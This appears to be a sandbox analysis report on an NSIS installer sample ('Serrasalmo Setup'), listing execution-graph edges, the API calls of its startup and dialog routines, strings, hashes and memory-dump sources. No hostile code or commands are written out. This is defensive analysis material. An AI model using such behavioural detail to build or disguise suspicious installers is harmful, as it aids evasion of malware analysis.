3625 40234f 3623->3625 3646 402cc9 3624->3646 3627 402bbf 18 API calls 3625->3627 3629 402356 3627->3629 3628 40232b 3630 402335 3628->3630 3634 40236c 3628->3634 3635 402bff RegOpenKeyExW 3629->3635 3631 402bbf 18 API 
calls 3630->3631 3632 40233c RegDeleteValueW RegCloseKey 3631->3632 3632->3634 3636 402c93 3635->3636 3643 402c2a 3635->3643 3636->3634 3637 402c50 RegEnumKeyW 3638 402c62 RegCloseKey 3637->3638 3637->3643 3640 40642a 5 API calls 3638->3640 3639 402c87 RegCloseKey 3644 402c76 3639->3644 3642 402c72 3640->3642 3641 402bff 5 API calls 3641->3643 3642->3644 3645 402ca2 RegDeleteKeyW 3642->3645 3643->3637 3643->3638 3643->3639 3643->3641 3644->3636 3645->3644 3647 402bbf 18 API calls 3646->3647 3648 402ce2 3647->3648 3649 402cf0 RegOpenKeyExW 3648->3649 3649->3628 2821 4032a0 SetErrorMode GetVersion 2822 4032d5 2821->2822 2823 4032db 2821->2823 2824 40642a 5 API calls 2822->2824 2909 4063ba GetSystemDirectoryW 2823->2909 2824->2823 2826 4032f1 lstrlenA 2826->2823 2827 403301 2826->2827 2912 40642a GetModuleHandleA 2827->2912 2830 40642a 5 API calls 2831 403310 #17 OleInitialize SHGetFileInfoW 2830->2831 2918 406050 lstrcpynW 2831->2918 2833 40334d GetCommandLineW 2919 406050 lstrcpynW 2833->2919 2835 40335f GetModuleHandleW 2836 403377 2835->2836 2920 405a31 2836->2920 2839 4034b0 GetTempPathW 2924 40326f 2839->2924 2841 4034c8 2842 403522 DeleteFileW 2841->2842 2843 4034cc GetWindowsDirectoryW lstrcatW 2841->2843 2934 402dee GetTickCount GetModuleFileNameW 2842->2934 2844 40326f 12 API calls 2843->2844 2847 4034e8 2844->2847 2845 405a31 CharNextW 2848 40339f 2845->2848 2847->2842 2849 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2847->2849 2848->2845 2851 40349b 2848->2851 2853 403499 2848->2853 2852 40326f 12 API calls 2849->2852 3018 406050 lstrcpynW 2851->3018 2860 40351a 2852->2860 2853->2839 2854 4035d9 2962 403899 2854->2962 2855 403536 2855->2854 2857 405a31 CharNextW 2855->2857 2861 4035e9 2855->2861 2873 403555 2857->2873 2860->2842 2860->2861 3035 4037bf 2861->3035 2862 403723 2865 4037a7 ExitProcess 2862->2865 2866 40372b GetCurrentProcess OpenProcessToken 2862->2866 2863 403603 3042 405795 2863->3042 2871 403743 
LookupPrivilegeValueW AdjustTokenPrivileges 2866->2871 2872 403777 2866->2872 2868 4035b3 3019 405b0c 2868->3019 2869 403619 3046 405718 2869->3046 2871->2872 2876 40642a 5 API calls 2872->2876 2873->2868 2873->2869 2879 40377e 2876->2879 2880 403793 ExitWindowsEx 2879->2880 2883 4037a0 2879->2883 2880->2865 2880->2883 2881 40363a lstrcatW lstrcmpiW 2881->2861 2885 403656 2881->2885 2882 40362f lstrcatW 2882->2881 3084 40140b 2883->3084 2888 403662 2885->2888 2889 40365b 2885->2889 2887 4035ce 3034 406050 lstrcpynW 2887->3034 3054 4056fb CreateDirectoryW 2888->3054 3049 40567e CreateDirectoryW 2889->3049 2894 403667 SetCurrentDirectoryW 2895 403682 2894->2895 2896 403677 2894->2896 3058 406050 lstrcpynW 2895->3058 3057 406050 lstrcpynW 2896->3057 2901 4036ce CopyFileW 2906 403690 2901->2906 2902 403717 2903 405ef1 38 API calls 2902->2903 2903->2861 2905 406072 18 API calls 2905->2906 2906->2902 2906->2905 2908 403702 CloseHandle 2906->2908 3059 406072 2906->3059 3077 405ef1 MoveFileExW 2906->3077 3081 405730 CreateProcessW 2906->3081 2908->2906 2910 4063dc wsprintfW LoadLibraryExW 2909->2910 2910->2826 2913 406450 GetProcAddress 2912->2913 2914 406446 2912->2914 2916 403309 2913->2916 2915 4063ba 3 API calls 2914->2915 2917 40644c 2915->2917 2916->2830 2917->2913 2917->2916 2918->2833 2919->2835 2921 405a37 2920->2921 2922 403386 CharNextW 2921->2922 2923 405a3e CharNextW 2921->2923 2922->2839 2922->2848 2923->2921 3087 4062e4 2924->3087 2926 403285 2926->2841 2927 40327b 2927->2926 3096 405a04 lstrlenW CharPrevW 2927->3096 2930 4056fb 2 API calls 2931 403293 2930->2931 3099 405c54 2931->3099 3103 405c25 GetFileAttributesW CreateFileW 2934->3103 2936 402e2e 2956 402e3e 2936->2956 3104 406050 lstrcpynW 2936->3104 2938 402e54 3105 405a50 lstrlenW 2938->3105 2942 402e65 GetFileSize 2943 402f61 2942->2943 2961 402e7c 2942->2961 3110 402d8a 2943->3110 2945 402f6a 2947 402f9a GlobalAlloc 2945->2947 2945->2956 3145 403258 SetFilePointer 2945->3145 3121 403258 
SetFilePointer 2947->3121 2948 402fcd 2953 402d8a 6 API calls 2948->2953 2951 402f83 2954 403242 ReadFile 2951->2954 2952 402fb5 3122 403027 2952->3122 2953->2956 2957 402f8e 2954->2957 2956->2855 2957->2947 2957->2956 2958 402d8a 6 API calls 2958->2961 2959 402fc1 2959->2956 2959->2959 2960 402ffe SetFilePointer 2959->2960 2960->2956 2961->2943 2961->2948 2961->2956 2961->2958 3142 403242 2961->3142 2963 40642a 5 API calls 2962->2963 2964 4038ad 2963->2964 2965 4038b3 2964->2965 2966 4038c5 2964->2966 3182 405f97 wsprintfW 2965->3182 3183 405f1d RegOpenKeyExW 2966->3183 2970 403914 lstrcatW 2971 4038c3 2970->2971 3166 403b6f 2971->3166 2972 405f1d 3 API calls 2972->2970 2975 405b0c 18 API calls 2976 403946 2975->2976 2977 4039da 2976->2977 2980 405f1d 3 API calls 2976->2980 2978 405b0c 18 API calls 2977->2978 2979 4039e0 2978->2979 2982 4039f0 LoadImageW 2979->2982 2983 406072 18 API calls 2979->2983 2981 403978 2980->2981 2981->2977 2986 403999 lstrlenW 2981->2986 2990 405a31 CharNextW 2981->2990 2984 403a96 2982->2984 2985 403a17 RegisterClassW 2982->2985 2983->2982 2989 40140b 2 API calls 2984->2989 2987 403aa0 2985->2987 2988 403a4d SystemParametersInfoW CreateWindowExW 2985->2988 2991 4039a7 lstrcmpiW 2986->2991 2992 4039cd 2986->2992 2987->2861 2988->2984 2993 403a9c 2989->2993 2994 403996 2990->2994 2991->2992 2995 4039b7 GetFileAttributesW 2991->2995 2996 405a04 3 API calls 2992->2996 2993->2987 2998 403b6f 19 API calls 2993->2998 2994->2986 2997 4039c3 2995->2997 2999 4039d3 2996->2999 2997->2992 3000 405a50 2 API calls 2997->3000 3001 403aad 2998->3001 3188 406050 lstrcpynW 2999->3188 3000->2992 3003 403ab9 ShowWindow 3001->3003 3004 403b3c 3001->3004 3006 4063ba 3 API calls 3003->3006 3175 405282 OleInitialize 3004->3175 3007 403ad1 3006->3007 3009 403adf GetClassInfoW 3007->3009 3011 4063ba 3 API calls 3007->3011 3008 403b42 3010 403b5e 3008->3010 3015 403b46 3008->3015 3013 403af3 GetClassInfoW RegisterClassW 3009->3013 3014 403b09 DialogBoxParamW 
3009->3014 3012 40140b 2 API calls 3010->3012 3011->3009 3012->2987 3013->3014 3016 40140b 2 API calls 3014->3016 3015->2987 3017 40140b 2 API calls 3015->3017 3016->2987 3017->2987 3018->2853 3197 406050 lstrcpynW 3019->3197 3021 405b1d 3198 405aaf CharNextW CharNextW 3021->3198 3024 4035bf 3024->2861 3033 406050 lstrcpynW 3024->3033 3025 4062e4 5 API calls 3031 405b33 3025->3031 3026 405b64 lstrlenW 3027 405b6f 3026->3027 3026->3031 3028 405a04 3 API calls 3027->3028 3030 405b74 GetFileAttributesW 3028->3030 3030->3024 3031->3024 3031->3026 3032 405a50 2 API calls 3031->3032 3204 406393 FindFirstFileW 3031->3204 3032->3026 3033->2887 3034->2854 3036 4037d7 3035->3036 3037 4037c9 CloseHandle 3035->3037 3207 403804 3036->3207 3037->3036 3043 4057aa 3042->3043 3044 403611 ExitProcess 3043->3044 3045 4057be MessageBoxIndirectW 3043->3045 3045->3044 3047 40642a 5 API calls 3046->3047 3048 40361e lstrcatW 3047->3048 3048->2881 3048->2882 3050 403660 3049->3050 3051 4056cf GetLastError 3049->3051 3050->2894 3051->3050 3052 4056de SetFileSecurityW 3051->3052 3052->3050 3053 4056f4 GetLastError 3052->3053 3053->3050 3055 40570b 3054->3055 3056 40570f GetLastError 3054->3056 3055->2894 3056->3055 3057->2895 3058->2906 3062 40607f 3059->3062 3060 4062ca 3061 4036c1 DeleteFileW 3060->3061 3265 406050 lstrcpynW 3060->3265 3061->2901 3061->2906 3062->3060 3064 406132 GetVersion 3062->3064 3065 406298 lstrlenW 3062->3065 3068 406072 10 API calls 3062->3068 3069 405f1d 3 API calls 3062->3069 3070 4061ad GetSystemDirectoryW 3062->3070 3071 4061c0 GetWindowsDirectoryW 3062->3071 3072 4062e4 5 API calls 3062->3072 3073 4061f4 SHGetSpecialFolderLocation 3062->3073 3074 406072 10 API calls 3062->3074 3075 406239 lstrcatW 3062->3075 3263 405f97 wsprintfW 3062->3263 3264 406050 lstrcpynW 3062->3264 3064->3062 3065->3062 3068->3065 3069->3062 3070->3062 3071->3062 3072->3062 3073->3062 3076 40620c SHGetPathFromIDListW CoTaskMemFree 3073->3076 3074->3062 3075->3062 3076->3062 3078 405f12 
3077->3078 3079 405f05 3077->3079 3078->2906 3266 405d7f lstrcpyW 3079->3266 3082 405763 CloseHandle 3081->3082 3083 40576f 3081->3083 3082->3083 3083->2906 3085 401389 2 API calls 3084->3085 3086 401420 3085->3086 3086->2865 3093 4062f1 3087->3093 3088 406367 3089 40636c CharPrevW 3088->3089 3091 40638d 3088->3091 3089->3088 3090 40635a CharNextW 3090->3088 3090->3093 3091->2927 3092 405a31 CharNextW 3092->3093 3093->3088 3093->3090 3093->3092 3094 406346 CharNextW 3093->3094 3095 406355 CharNextW 3093->3095 3094->3093 3095->3090 3097 405a20 lstrcatW 3096->3097 3098 40328d 3096->3098 3097->3098 3098->2930 3100 405c61 GetTickCount GetTempFileNameW 3099->3100 3101 40329e 3100->3101 3102 405c97 3100->3102 3101->2841 3102->3100 3102->3101 3103->2936 3104->2938 3106 405a5e 3105->3106 3107 402e5a 3106->3107 3108 405a64 CharPrevW 3106->3108 3109 406050 lstrcpynW 3107->3109 3108->3106 3108->3107 3109->2942 3111 402d93 3110->3111 3112 402dab 3110->3112 3113 402da3 3111->3113 3114 402d9c DestroyWindow 3111->3114 3115 402db3 3112->3115 3116 402dbb GetTickCount 3112->3116 3113->2945 3114->3113 3146 406466 3115->3146 3118 402dc9 CreateDialogParamW ShowWindow 3116->3118 3119 402dec 3116->3119 3118->3119 3119->2945 3121->2952 3123 403040 3122->3123 3124 40306e 3123->3124 3163 403258 SetFilePointer 3123->3163 3125 403242 ReadFile 3124->3125 3127 403079 3125->3127 3128 4031db 3127->3128 3129 40308b GetTickCount 3127->3129 3131 4031c5 3127->3131 3130 40321d 3128->3130 3135 4031df 3128->3135 3129->3131 3138 4030da 3129->3138 3132 403242 ReadFile 3130->3132 3131->2959 3132->3131 3133 403242 ReadFile 3133->3138 3134 403242 ReadFile 3134->3135 3135->3131 3135->3134 3136 405cd7 WriteFile 3135->3136 3136->3135 3137 403130 GetTickCount 3137->3138 3138->3131 3138->3133 3138->3137 3139 403155 MulDiv wsprintfW 3138->3139 3161 405cd7 WriteFile 3138->3161 3150 4051af 3139->3150 3164 405ca8 ReadFile 3142->3164 3145->2951 3147 406483 PeekMessageW 3146->3147 3148 402db9 3147->3148 3149 406479 
DispatchMessageW 3147->3149 3148->2945 3149->3147 3151 4051ca 3150->3151 3160 40526c 3150->3160 3152 4051e6 lstrlenW 3151->3152 3153 406072 18 API calls 3151->3153 3154 4051f4 lstrlenW 3152->3154 3155 40520f 3152->3155 3153->3152 3156 405206 lstrcatW 3154->3156 3154->3160 3157 405222 3155->3157 3158 405215 SetWindowTextW 3155->3158 3156->3155 3159 405228 SendMessageW SendMessageW SendMessageW 3157->3159 3157->3160 3158->3157 3159->3160 3160->3138 3162 405cf5 3161->3162 3162->3138 3163->3124 3165 403255 3164->3165 3165->2961 3167 403b83 3166->3167 3189 405f97 wsprintfW 3167->3189 3169 403bf4 3170 406072 18 API calls 3169->3170 3171 403c00 SetWindowTextW 3170->3171 3172 403924 3171->3172 3173 403c1c 3171->3173 3172->2975 3173->3172 3174 406072 18 API calls 3173->3174 3174->3173 3190 404160 3175->3190 3177 4052cc 3178 404160 SendMessageW 3177->3178 3180 4052de CoUninitialize 3178->3180 3179 4052a5 3179->3177 3193 401389 3179->3193 3180->3008 3182->2971 3184 4038f5 3183->3184 3185 405f51 RegQueryValueExW 3183->3185 3184->2970 3184->2972 3187 405f72 RegCloseKey 3185->3187 3187->3184 3188->2977 3189->3169 3191 404178 3190->3191 3192 404169 SendMessageW 3190->3192 3191->3179 3192->3191 3195 401390 3193->3195 3194 4013fe 3194->3179 3195->3194 3196 4013cb MulDiv SendMessageW 3195->3196 3196->3195 3197->3021 3199 405acc 3198->3199 3203 405ade 3198->3203 3200 405ad9 CharNextW 3199->3200 3199->3203 3201 405b02 3200->3201 3201->3024 3201->3025 3202 405a31 CharNextW 3202->3203 3203->3201 3203->3202 3205 4063b4 3204->3205 3206 4063a9 FindClose 3204->3206 3205->3031 3206->3205 3208 403812 3207->3208 3209 403817 FreeLibrary GlobalFree 3208->3209 3210 4037dc 3208->3210 3209->3209 3209->3210 3211 405841 3210->3211 3212 405b0c 18 API calls 3211->3212 3213 405861 3212->3213 3214 405880 3213->3214 3215 405869 DeleteFileW 3213->3215 3217 4059ab 3214->3217 3250 406050 lstrcpynW 3214->3250 3216 4035f2 OleUninitialize 3215->3216 3216->2862 3216->2863 3217->3216 3224 406393 2 API calls 
3217->3224 3219 4058a6 3220 4058b9 3219->3220 3221 4058ac lstrcatW 3219->3221 3223 405a50 2 API calls 3220->3223 3222 4058bf 3221->3222 3225 4058cf lstrcatW 3222->3225 3227 4058da lstrlenW FindFirstFileW 3222->3227 3223->3222 3226 4059c5 3224->3226 3225->3227 3226->3216 3228 4059c9 3226->3228 3230 4059a0 3227->3230 3248 4058fc 3227->3248 3229 405a04 3 API calls 3228->3229 3231 4059cf 3229->3231 3230->3217 3233 4057f9 5 API calls 3231->3233 3232 405983 FindNextFileW 3236 405999 FindClose 3232->3236 3232->3248 3235 4059db 3233->3235 3237 4059f5 3235->3237 3238 4059df 3235->3238 3236->3230 3240 4051af 25 API calls 3237->3240 3238->3216 3241 4051af 25 API calls 3238->3241 3240->3216 3243 4059ec 3241->3243 3242 405841 62 API calls 3242->3248 3244 405ef1 38 API calls 3243->3244 3246 4059f3 3244->3246 3245 4051af 25 API calls 3245->3232 3246->3216 3247 4051af 25 API calls 3247->3248 3248->3232 3248->3242 3248->3245 3248->3247 3249 405ef1 38 API calls 3248->3249 3251 406050 lstrcpynW 3248->3251 3252 4057f9 3248->3252 3249->3248 3250->3219 3251->3248 3260 405c00 GetFileAttributesW 3252->3260 3255 405814 RemoveDirectoryW 3257 405822 3255->3257 3256 40581c DeleteFileW 3256->3257 3258 405826 3257->3258 3259 405832 SetFileAttributesW 3257->3259 3258->3248 3259->3258 3261 405c12 SetFileAttributesW 3260->3261 3262 405805 3260->3262 3261->3262 3262->3255 3262->3256 3262->3258 3263->3062 3264->3062 3265->3061 3267 405da7 3266->3267 3268 405dcd GetShortPathNameW 3266->3268 3293 405c25 GetFileAttributesW CreateFileW 3267->3293 3270 405de2 3268->3270 3271 405eec 3268->3271 3270->3271 3273 405dea wsprintfA 3270->3273 3271->3078 3272 405db1 CloseHandle GetShortPathNameW 3272->3271 3274 405dc5 3272->3274 3275 406072 18 API calls 3273->3275 3274->3268 3274->3271 3276 405e12 3275->3276 3294 405c25 GetFileAttributesW CreateFileW 3276->3294 3278 405e1f 3278->3271 3279 405e2e GetFileSize GlobalAlloc 3278->3279 3280 405e50 3279->3280 3281 405ee5 CloseHandle 3279->3281 3282 405ca8 ReadFile 
3280->3282 3281->3271 3283 405e58 3282->3283 3283->3281 3295 405b8a lstrlenA 3283->3295 3286 405e83 3288 405b8a 4 API calls 3286->3288 3287 405e6f lstrcpyA 3289 405e91 3287->3289 3288->3289 3290 405ec8 SetFilePointer 3289->3290 3291 405cd7 WriteFile 3290->3291 3292 405ede GlobalFree 3291->3292 3292->3281 3293->3272 3294->3278 3296 405bcb lstrlenA 3295->3296 3297 405bd3 3296->3297 3298 405ba4 lstrcmpiA 3296->3298 3297->3286 3297->3287 3298->3297 3299 405bc2 CharNextA 3298->3299 3299->3296 4019 405123 4020 405133 4019->4020 4021 405147 4019->4021 4022 405190 4020->4022 4023 405139 4020->4023 4024 40514f IsWindowVisible 4021->4024 4030 405166 4021->4030 4025 405195 CallWindowProcW 4022->4025 4026 404160 SendMessageW 4023->4026 4024->4022 4027 40515c 4024->4027 4028 405143 4025->4028 4026->4028 4032 404a79 SendMessageW 4027->4032 4030->4025 4037 404af9 4030->4037 4033 404ad8 SendMessageW 4032->4033 4034 404a9c GetMessagePos ScreenToClient SendMessageW 4032->4034 4035 404ad0 4033->4035 4034->4035 4036 404ad5 4034->4036 4035->4030 4036->4033 4046 406050 lstrcpynW 4037->4046 4039 404b0c 4047 405f97 wsprintfW 4039->4047 4041 404b16 4042 40140b 2 API calls 4041->4042 4043 404b1f 4042->4043 4048 406050 lstrcpynW 4043->4048 4045 404b26 4045->4022 4046->4039 4047->4041 4048->4045 4049 401ca3 4050 402ba2 18 API calls 4049->4050 4051 401ca9 IsWindow 4050->4051 4052 401a05 4051->4052 4053 402a27 SendMessageW 4054 402a41 InvalidateRect 4053->4054 4055 402a4c 4053->4055 4054->4055 4056 404228 lstrcpynW lstrlenW 4057 40242a 4058 402cc9 19 API calls 4057->4058 4059 402434 4058->4059 4060 402bbf 18 API calls 4059->4060 4061 40243d 4060->4061 4062 402448 RegQueryValueExW 4061->4062 4067 40281e 4061->4067 4063 40246e RegCloseKey 4062->4063 4064 402468 4062->4064 4063->4067 4064->4063 4068 405f97 wsprintfW 4064->4068 4068->4063 4069 404b2b GetDlgItem GetDlgItem 4070 404b7d 7 API calls 4069->4070 4078 404d96 4069->4078 4071 404c20 DeleteObject 4070->4071 4072 404c13 SendMessageW 
[Execution graph edge list, continued: node-to-node edges between basic blocks in the 0x401000-0x406000 range, each annotated with the Win32 calls made in that block (SendMessageW, GetDlgItem, lstrcpynW, GetFileAttributesW, SetCurrentDirectoryW, WriteFile, ...). This is the text source of the rendered graph and is omitted here; the per-function API lists that follow carry the call information in readable form.]

                                                                                Control-flow Graph
                                                                                Function 004032A0: the NSIS installer stub's entry routine (WinMain). The rendered graph and its edge list are omitted; what the blocks do, in order: set the error mode, call InitCommonControls (COMCTL32 ordinal 17) and OleInitialize, parse the command line (GetCommandLineW, CharNextW loop), pick a writable temp directory (GetTempPathW first, then %WINDIR%\Temp, then %TEMP%\Low, in which last case TEMP and TMP are re-exported so child processes follow), delete the language marker file, copy the stub to ~nsu*.tmp in the temp directory when it runs as an uninstaller, and, when the script set the reboot flag, enable SeShutdownPrivilege and call ExitWindowsEx. The APIs reached on these paths are listed below.
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                • GetVersion.KERNEL32 ref: 004032C9
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                • #17.COMCTL32(00000007,00000009), ref: 00403315 (ordinal 17 = InitCommonControls)
                                                                                • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                • GetCommandLineW.KERNEL32(Serrasalmo Setup,NSIS Error), ref: 0040334D
                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000), ref: 00403360
                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000020), ref: 00403387
                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                • ExitProcess.KERNEL32 ref: 00403613
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403626
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403635
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403640
                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 0040364C
                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\WtZl31OLfA.exe,0042AA08,00000001), ref: 004036D6
                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796 (EWX_REBOOT; reason 0x80040002 = SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION, the stub's stock reboot path)
                                                                                • ExitProcess.KERNEL32 ref: 004037B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism\Vekselformular$C:\Users\user\Desktop$C:\Users\user\Desktop\WtZl31OLfA.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Serrasalmo Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 2488574733-2835043443
                                                                                • Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                • Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

                                                                                Control-flow Graph
                                                                                Function 004052EE: the NSIS stub's install-page dialog procedure. The rendered graph and its edge list are omitted; the blocks configure the details list view (LVM_* messages: 0x1061 LVM_INSERTCOLUMNW, 0x1036 LVM_SETEXTENDEDLISTVIEWSTYLE, 0x1001/0x1024/0x1026 colour settings), start the install thread with CreateThread, and implement the list's right-click "Copy Details To Clipboard" menu: CreatePopupMenu/AppendMenuW/TrackPopupMenu, then LVM_GETITEMTEXTW (0x1073) per row into a GlobalAlloc buffer handed to SetClipboardData as CF_UNICODETEXT (0x0D). That sequence writes text to the clipboard; nothing in it reads clipboard contents. The APIs reached are listed below.
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                • GetClientRect.USER32(?,?), ref: 00405398
                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                  • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004054C3
                                                                                • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                • ShowWindow.USER32(0001045E,00000008), ref: 004054EC
                                                                                • ShowWindow.USER32(00000008), ref: 00405536
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                • CreatePopupMenu.USER32 ref: 0040557B
                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                • EmptyClipboard.USER32 ref: 00405616
                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B (0x0D = CF_UNICODETEXT)
                                                                                • CloseClipboard.USER32 ref: 00405671
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
